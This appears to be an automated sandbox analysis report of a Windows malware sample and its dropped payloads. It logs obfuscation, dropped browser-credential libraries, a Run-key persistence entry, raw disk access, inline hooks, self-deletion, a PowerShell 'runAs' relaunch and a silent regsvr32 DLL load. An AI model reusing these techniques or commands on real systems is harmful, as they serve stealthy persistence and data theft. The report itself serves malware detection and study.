                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: S23UhdW5DH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\viweyaxehara hojicikepuxe\vosi\cavadelawi74\gizagol\res.pdb source: S23UhdW5DH.exe, 00000000.00000000.2058707940.0000000000427000.00000002.00000001.01000000.00000003.sdmp, S23UhdW5DH.exe, 00000000.00000002.2135326441.0000000000427000.00000002.00000001.01000000.00000003.sdmp, rghwvve, 00000006.00000000.2330117193.0000000000427000.00000002.00000001.01000000.00000005.sdmp, rghwvve, 00000006.00000002.2410440238.0000000000427000.00000002.00000001.01000000.00000005.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\S23UhdW5DH.exeUnpacked PE file: 0.2.S23UhdW5DH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\rghwvveUnpacked PE file: 6.2.rghwvve.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpUnpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeUnpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpUnpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB070 LoadLibraryW,GetProcAddress,VirtualProtect,8_2_005CB070
                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp@3
                Source: 1EB9.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x754f9c
                Source: vbsmartcardviewer.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x2f219e
                Source: vueqjgslwynd.exe.42.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                Source: 1199.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1feacf
                Source: ObjectSerialization65.exe.26.drStatic PE information: real checksum: 0x0 should be: 0x2f219e
                Source: is-C4TNB.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xb015d
                Source: _iscrypt.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                Source: INetC.dll.31.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                Source: FourthX.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                Source: 1EB9.tmp.20.drStatic PE information: real checksum: 0x0 should be: 0xb389e
                Source: 356F.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x8be514
                Source: 288c47bbc1871b439df19ff4df68f076.exe.27.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
                Source: _RegDLL.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xc2b7
                Source: BroomSetup.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                Source: 1EB9.tmp.17.drStatic PE information: real checksum: 0x0 should be: 0xb389e
                Source: _isdecmp.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x123ff
                Source: _setup64.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x8546
                Source: InstallSetup4.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                Source: 1199.dll.2.drStatic PE information: section name: nqb
                Source: 1199.dll.2.drStatic PE information: section name: .qdata
                Source: 1199.dll.2.drStatic PE information: section name: xcg
                Source: 1199.dll.2.drStatic PE information: section name: HIcf6ht
                Source: FE8B.exe.2.drStatic PE information: section name: .vmp@3
                Source: 572.exe.2.drStatic PE information: section name: .fofufe
                Source: 572.exe.2.drStatic PE information: section name: .safaz
                Source: csrss.exe.9.drStatic PE information: section name: .fofufe
                Source: csrss.exe.9.drStatic PE information: section name: .safaz
                Source: is-S9GPV.tmp.21.drStatic PE information: section name: /4
                Source: is-1HD49.tmp.21.drStatic PE information: section name: /4
                Source: is-GIJA5.tmp.21.drStatic PE information: section name: /4
                Source: is-IJL2N.tmp.21.drStatic PE information: section name: /4
                Source: is-13K5P.tmp.21.drStatic PE information: section name: /4
                Source: is-1P6UB.tmp.21.drStatic PE information: section name: /4
                Source: is-IJ17E.tmp.21.drStatic PE information: section name: /4
                Source: is-OFQS5.tmp.21.drStatic PE information: section name: /4
                Source: is-0PI80.tmp.21.drStatic PE information: section name: /4
                Source: is-VN2OC.tmp.21.drStatic PE information: section name: /4
                Source: is-A87KG.tmp.21.drStatic PE information: section name: /4
                Source: is-F43KE.tmp.21.drStatic PE information: section name: /4
                Source: is-399KA.tmp.21.drStatic PE information: section name: /4
                Source: FourthX.exe.27.drStatic PE information: section name: .00cfg
                Source: BroomSetup.exe.31.drStatic PE information: section name: .didata
                Source: vueqjgslwynd.exe.42.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.43.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.43.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.43.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.43.drStatic PE information: section name: .didat
                Source: nss3.dll.43.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.43.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.43.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.43.drStatic PE information: section name: .00cfg
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00403253 push eax; ret 0_2_0040332D
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00401C64 push es; retf 0_2_00401C83
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0040332A push eax; ret 0_2_0040332D
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00551CCB push es; retf 0_2_00551CEA
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00552FF8 push 60B44389h; retf 0_2_00553012
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00403253 push eax; ret 6_2_0040332D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00401C64 push es; retf 6_2_00401C83
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_0040332A push eax; ret 6_2_0040332D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C1CCB push es; retf 6_2_004C1CEA
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C2FF8 push 60B44389h; retf 6_2_004C3012
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeCode function: 7_2_008BC713 push 8C34D431h; mov dword ptr [esp], edx7_2_008BC718
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB960 push ecx; mov dword ptr [esp], 000343F0h8_2_005CB961
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401E25 push ecx; ret 8_2_00401E38
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0248A2EF push ebx; iretd 8_2_0248A2F7
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_024DE70A pushad ; ret 8_2_024DE70C
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0257C7F8 push edx; retf 8_2_0257C7F9
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_025447ED push ebp; retf 8_2_025447EE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0254480A push 5A36841Dh; retf 8_2_02544825
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_0257C4BD push cs; ret 8_2_0257C4BE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_023D1DA3 push esi; retf 8_2_023D1DA4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_00696299 push ecx; ret 9_2_006962AC
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040A3BD push eax; retf 10_2_0040A3BE
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_03143097 push ecx; iretd 14_2_03143128
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_031430EE push ecx; iretd 14_2_0314311A
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_0040A3BD push eax; retf 16_2_0040A3BE
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_004065B8 push 004065F5h; ret 17_2_004065ED
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_004040B5 push eax; ret 17_2_004040F1
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00408104 push ecx; mov dword ptr [esp], eax17_2_00408109
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00404185 push 00404391h; ret 17_2_00404389
                Source: S23UhdW5DH.exeStatic PE information: section name: .text entropy: 7.661739793438813
                Source: 1199.dll.2.drStatic PE information: section name: .text entropy: 7.997734235058858
                Source: 572.exe.2.drStatic PE information: section name: .text entropy: 7.985255731332923
                Source: 66E0.exe.2.drStatic PE information: section name: .text entropy: 7.426788155330278
                Source: rghwvve.2.drStatic PE information: section name: .text entropy: 7.661739793438813
                Source: csrss.exe.9.drStatic PE information: section name: .text entropy: 7.985255731332923
                Source: syncUpd[1].exe.31.drStatic PE information: section name: .text entropy: 7.476611299848768
                Source: nsx5151.tmp.31.drStatic PE information: section name: .text entropy: 7.476611299848768

                Persistence and Installation Behavior

                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeFile created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghwvveJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)Jump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE8B.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\356F.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\66E0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmpJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\93B.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsx5151.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1199.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1EB9.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-C4TNB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\FourthX.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\356F.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile created: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeFile created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpFile created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\572.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                Source: C:\Users\user\AppData\Local\Temp\572.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\s23uhdw5dh.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rghwvve:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: BF0005 value: E9 8B 2F 79 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 77382F90 value: E9 7A D0 86 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1050005 value: E9 2B BA 2F 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 7734BA30 value: E9 DA 45 D0 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1060008 value: E9 8B 8E 33 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 77398E90 value: E9 80 71 CC 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1080005 value: E9 8B 4D 8B 75 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 76934D90 value: E9 7A B2 74 8A Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1090005 value: E9 EB EB 8B 75 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 7694EBF0 value: E9 1A 14 74 8A Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 10A0005 value: E9 8B 8A 88 74 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 75928A90 value: E9 7A 75 77 8B Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 10B0005 value: E9 2B 02 8A 74 Jump to behavior
